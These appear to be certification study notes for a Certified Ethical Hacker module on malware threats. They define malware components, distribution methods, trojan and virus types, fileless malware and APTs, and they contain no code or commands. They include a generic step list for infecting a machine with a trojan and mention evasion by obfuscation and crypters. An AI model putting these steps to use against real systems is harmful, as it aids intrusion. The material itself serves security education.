Certified Ethical Hacker (CEHv13) Module 07 Malware Threats

Malware

Malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator

Ways for Malware to Enter the System

- Instant Messenger Applications

- Portable Hardware Media/Removable Devices

- Browser and Email Software Bugs

- Insecure Patch Management

- Rogue/Decoy Applications

- Untrusted Sites and Free Web Applications/Software

- Downloading Files from the Internet

- Email Attachments

- Network Propogation

- File Sharing

- Installation by other Malware

- Bluetooth and Wireless Networks

Autorun/Autoplay/Autostart

A Windows feature that runs an executable program when a user connects a USB device or memory card

Techniques Attackers Use to Distribute Malware on the Web

- Black Hat Search Engine Optimization (SEO)

- Social Engineered Click Jacking

- Spear Phishing Sites

- Malvertising

- Compromised Legitimate Websites

- Drive-by-Downloads

- Spam Email

- Rich Text Format (RTF) Injection

Black Hat Search Engine Optimization (SEO)

Uses SEO tactics to get higher search engine rankings for malware pages

Social Engineered Click Jacking

Attackers inject malware into websites that appear legitimate to trick users into clicking them. When clicked the malware embedded in the link executes.

Spear Phishing SItes

This technique is used for mimicking legitimate institutions, such as banks, to steal passwords, credit card and bank account data, and other sensitive information.

Malvertising

Involves embedding malware-laden advertisements in legitimate online advertising channels to spread malware on systems of unsuspecting users

Drive By Downloads

Refers to the unintentional downloading of software via the Internet. Here, an attacker exploits flaws in browser software to install malware by merely visiting a website.

Spam Emails

Attacker attaches malicious file to an email and the victim is tricked into clicking the attachment and thus executes malware

RTF Templates

Used for specifying the document format in Microsoft Office

Rich Text Format (RTF) Injection

Attackers inject malicious macros into RTF files and host them on their servers. When a user opens the document, the malicious template is automatically retrieved from the remote server by evading security systems.

Components of Malware

- Crypter

- Downloaders

- Dropper

- Exploit

- Injector

- Obfuscator

- Packer

- Payload

- Malicious Code

Crypter

Conceals existence of malware to elude antivirus detection. It protects malware from reverse engineering or analysis.

Downloader

A type of trojan which downloads other malware

Dropper

o It is a covert carrier of malware. Attackers embed notorious malware files inside droppers, which can perform the installation task covertly. Attackers need to first install the malware program or code on the system to execute the dropper. The dropper can transport malware code and execute malware on a target system without being detected by antivirus scanners

Exploit

Part of malware which contains code or commands that can take advance of a bug or vulnerability

Injector

Program injects exploits or malicious code available in the malware into other vulnerable running processes

Obfuscator

Conceals malicious code making it difficult for security mechanisms to detect or remove it

Packer

Compresses Malware into Unreadable Format

Payload

Performs desired activity

Malicious Code

A piece of code that defines the basic functionality of the malware and comprises commands that result in security breaches

Potentially Unwanted Applications/ Programs (PUAs/PUPs)/Grayware/Junkware

Potentially harmful applications that may pose severe risks to the security and privacy of data stored in the system where they are installed. PUAs can degrade system performance and compromise privacy and data security. Most PUAs get installed when downloading and installing freeware using a third-party installer or when accepting a misleading license agreement.

Types of Potentially Unwanted Applications/ Programs (PUAs/PUPs)

- Adware

- Torrent

- Marketing

- Cryptomining

- Dialers

Adware

Display unsolicited advertisements offering free sales and pop-ups of online services when browsing websites

Marketing PUAs/PUPs

Monitor the online activities performed by users and send browser details and information regarding personal interests to third-party app owners. These applications then market products and resources based on users' personal interests.

Cryptomining

Make use of the victims' personal assets and financial data on the system and perform the digital mining of cryptocurrencies such as bitcoins

Dialers

Programs that get installed and configured in a system automatically to call a set of contacts at several locations without the user's consent. Dialers cause massive telephone bills and are sometimes very difficult to locate and delete.

Indicators of Adware

- Frequent System Lag

- Indurated Advertisements

- Incessant System Crash

- Disparity in the Default Browser Homepage

- Prescence of New Toolbar or Browser Add-Ons

= Slow Internet

- Unusual Network Traffic

- Difficulty Removing Unwanted Software

- Unauthorized Data Collection

Advanced Persistent Threat (APT)

A type of network attack whereby an attacker gains unauthorized access to a target network and remains in the network without being detected for a long time

Characteristics of APTs

- Objectives

- Timeliness

- Resources

- Risk Tolerance

- Skills and Methods

- Actions

- Attack Origination Points

- Numbers Involved in the Attack

- Knowledge Source

- Multi-Phased

- Tailored to the Vulnerabilities

- Multiple Points of Entries

- Evading Signature-Based Detection Systems

- Specific Warning Signs

- Highly Targeted

- Long-Term Engagement

- Use of Advanced Techniques

- Complex Command and Control (C2) Infrastructure

APT Lifecycle Phases

- Preparation

- Initial Intrusion

- Expansion

- Persistence

- Search and Exfiltration

- Cleanup

Trojan

A program in which malicious or harmful code is contained inside an apparently harmless program or data

Types of Trojans

- Remote Access Trojans

- Backdoor Trojans

- Botnet Trojans

- Service Protocol Trojans

- Mobile Trojans

- IoT Trojans

- Rootkit Trojans

- Security Software Disabler Trojans

- E-Banking Trojans

- Destructive Trojans

- Point-of-Sale Trojans

- Defacement Trojans

- DDos Attaack Trojans

- Command Shell Trojans

Remote Access Trojans (RATs)

Provides attackers with full control over the victim's system, thereby enabling them to remotely access files, private conversations, accounting data, etc

Backdoor Trojans

A program that can bypass the standard system authentication or conventional system mechanisms such as IDS and firewalls, without being detected. In these types of breaches, hackers leverage backdoor programs to access the victim's computer or network.

Botnet Trojans

Attackers use botnet Trojans to infect a large number of computers throughout a large geographical area to create a network of bots (or a "bot herd") that can achieve control via a command-and-control (C&C) center. Once the user downloads and executes this botnet Trojan in the system, it connects back to the attacker using IRC channels and waits for further instructions.

Rootkit Trojans

Potent backdoors that specifically attack the root or OS

E-Banking Trojans

They intercept the victim's account information before the system can encrypt it and send it to the attacker's command-and-control center. Attackers program these Trojans to steal minimum and maximum monetary amounts, so that they do not withdraw all the money in the account, thereby avoiding suspicion.

Transaction Authentication Number (TAN)

A single-use password for authenticating online banking transactions

TAN Grabber

Banking Trojans intercept valid TANs entered by users and replace them with random numbers. The bank will reject such invalid random numbers. Subsequently, the attacker misuses the intercepted TAN with the target's login details.

HTML Injection

The Trojan creates fake form fields on e-banking pages, thereby enabling the attacker to collect the target's account details, credit card number, date of birth, etc. The attacker can use this information to impersonate the target and compromise his/her account.

Form Grabber

A type of malware that capture's a target's sensitive data from a web browser form. It analyses POST requests and responses to the victim's browser. It compromises the scramble pad authentication and intercepts the scramble pad input as the user enters his/her Customer Number and Personal Access Code.

Cover Credential Grabber

Once the user attempts to make an online transaction, the Trojan covertly steals the login credentials and transmits them to the hacker

Components of E-Banking Trojans

- TAN Grabber

- HTML Injection

- Form Grabber

- Covert Credential Grabber

Point of Sale (POS) Trojans

A type of financial fraudulent malware that target POS and payment equipment such as credit card/debit card readers

Defacement Trojans

Can destroy or change the entire content of a database

Service Protocol Torjans

Take advantage of vulnerable service protocols

Types of Service Protocol Trojans

- VNC

- HTTP/HTTPS

HTTP/HTTPS Trojan

Creates a local shell on the victim's computer that connects to the webserver that the attacker owns through an HTTP request

Mobile Trojans

Target mobile phones

Internet of things (IoT)

The inter-networking of physical devices, buildings, and other items embedded with electronics

IoT Trojans

The Internet of things (IoT) refers to the inter-networking of physical devices, buildings, and other items embedded with electronics. IoT Trojans are malicious programs that attack IoT networks.

Security Software Disabler Trojans

Stop security programs by disabling them or killing the processes

Destructive Trojans

Delete files on target system

DDoS Attack Trojans

Intended to perform DDoS attacks. They make the victim a zombie that listens for commands sent from a DDoS Server on the Internet.. There will be numerous infected systems standing by for a command from the server, and when the server sends the command to all or a group of the infected systems, since all the systems perform the command simultaneously, a considerable amount of legitimate requests flood the target and cause the service to stop responding.

Command Shell Trojans

Provide a remote control command shell on the victim's machine

Steps to Infecting a Machine via a Trojan

1. Create a new Trojan packet

2. Employ a dropper or downloader to install the malicious code on the target system

3. Employ a wrapper to bind the Trojan executable with legitimate files

4. Employ a crypter to encrypt the trojan to evade detection

5. Propagate the trojan

6. Deploy the trojan on victim's machine by executing the dropper or downloading software

7. Execute damage routine

Overt

Something explicit, obvious, or evident

Covert

Something hidden or concealed

Overt Channel

A legal channel for the transfer of data or information in a company network, and it works securely to transfer data and information

Covert Channel

Illegal, hidden path used to transfer data from a network

Exploit Kit/Crimeware Toolkit

Used to exploit security loopholes found in software application by delivering malware to the target system

Viruses

Self-replicating programs that further infect machines with interaction from users

Stages of Virus Lifecycle

1. Design

2. Replication

3. Launch

Virus Phases

- Infection Phase

- Attack Phase

Virus Methods of Infecting

- Downloads

- Email Attachments

- Pirated software

- Failing to install security software

- Updating software

- Browser

- Firewall

- Popups

- Removable Media

- Network Access

- Backup and Restore

- Malicious Online Ads

- Social Media

Types of Viruses

- System or boot sector

- File

- Multipartite

- Macro

- Cluster

- Stealth/Tunneling

- Encryption

- Sparse Infector

- Metamorphic

- Overwriting File or Cavity

- Companion/Camouflage

- Shell

- File Extension

- FAT

- Logic Bomb

- Web Scripting

- Email

- Armored

- Add-On

- Intrusive

- Direction Action or Transient

- Terminate and Stay Resident (TSR)

File Viruses

File viruses insert their code into the original file and infect executable files

Multipartite Virus

Combines the approach of file and boot record infectors

Cluster Viruses

They infect files without changing the file or planting additional files. They save the virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk read point to the virus code instead of the actual program.

Stealth/Tunneling Viruses

Try to hide from antivirus programs by actively altering and corrupting the service call interrupts while running

Sparse Infector

Infect less often to try to minimalize their probability of discovery

Metamorphic Viruses

Programmed such that they rewrite themselves completely each time they infect a new executable file

Overwriting File or Cavity Viruses

Overwrite host file without increasing the length of the file

Companion/Camouflage Virus

Stores itself with the same filename as the target program file

File Extension Virus

Changes extension of files

File Allocation Table (FAT) Virus

The FAT is a system used in Microsoft products and some other types of computer systems to access the information stored on a computer. FAT Viruses attack the index making it impossible for the computer to locate files.

Logic Bomb

Virus Triggered in Response to an Event

Types of Web Scripting Viruses

- Persistent

- Non-Persistent

Armored Viruses

Designed to confuse or trick deployed antivirus systems to prevent them from detecting the actual source of the infection

Anti-Emulation Techniques

Used to avoid dynamic analysis by fingerprinting the emulated system environment

Anti-Goat Techniques

Use heuristic rules to detect possible goat files such as a virus that cannot infect a file if it is too small or if it contains a large amount of do-nothing instructions.

Direct Action/Transient Viruses

Transfer all controls of the host code to where it resides in the

memory.

Terminate and Stay Resident (TSR) Virus

Remains permanently in the target machine's memory during an entire work session, even after the target host's program is executed and terminated.

Virus Hoaxes

False alarms claiming reports about a non-existing virus that may contain virus attachments video

Fake Antivirus

Malware designed to imitate legitimate security software, thereafter stealing information from unsuspecting users

Ransomware

A type of malware that restricts access to the infected computer system or critical files and documents stored on it, and then demands an online ransom payment to the malware creator(s) to remove user restrictions.

Worms

Are standalone malicious programs that replicate, execute, and spread across network connections independently without human intervention

Fileless Malware

Infects legitimate software, applications, and other

protocols existing in the system to perform various malicious activities.

Benefits of Fileless Malware

- Stealth

- Living off the Land (LOL)

- Trustworthy

- Persistence without files

- Simplify infection process

- Increased success rate in target attacks

- Complicating forensic analysis and incident response

Living off the Land

Exploit techniques that use standard system tools and packages to perform intrusions

Types of Fileless Malware

- Type 1: No file Activity Performed

- Type 2: Indirect File Activity

- Type 3: Required Files to Operate

Fileless Malware Stages

1. Point of Entry: Memory Exploits, Malicious Websites, Phishing Email/Malicious Document

2. Code Execution: Code Injection, Script-Based Injection

3. Persistence: Windows Registry, Windows Management Instrumentation (WMI), Windows Task Scheduler

4. Achieving Objectives

Obfuscation techniques used by fileless malware to bypass antivirus solutions

- Inserting characters, parentheses, caret symbols, and double quotes

- Using custom and pre-assigned environment variables

AI Based Malware

Refers to malicious software that harnesses AI methodologies and algorithms to amplify its functionalities and accomplish goals

Phases of AI Based Malware

1. Infiltration

2. Establishment

3. Learning Phase

4. Adaptation

5. Execution

6. Propagation

7. Evolution

Generative Adversarial Networks (GANs)

Used for generating new data that is similar to but distinct from the data on which they were trained

Natural Language Processing (NLP)

Focuses on the interaction between computers and humans through natural language. The primary goal of NLP is to enable computers to understand, interpret, and generate human languages in a valuable way.

Sheep dipping

Refers to the analysis of suspicious files, incoming messages, etc., for malware. The users isolate the sheep-dipped computer from other computers on the network to block any malware from entering the system.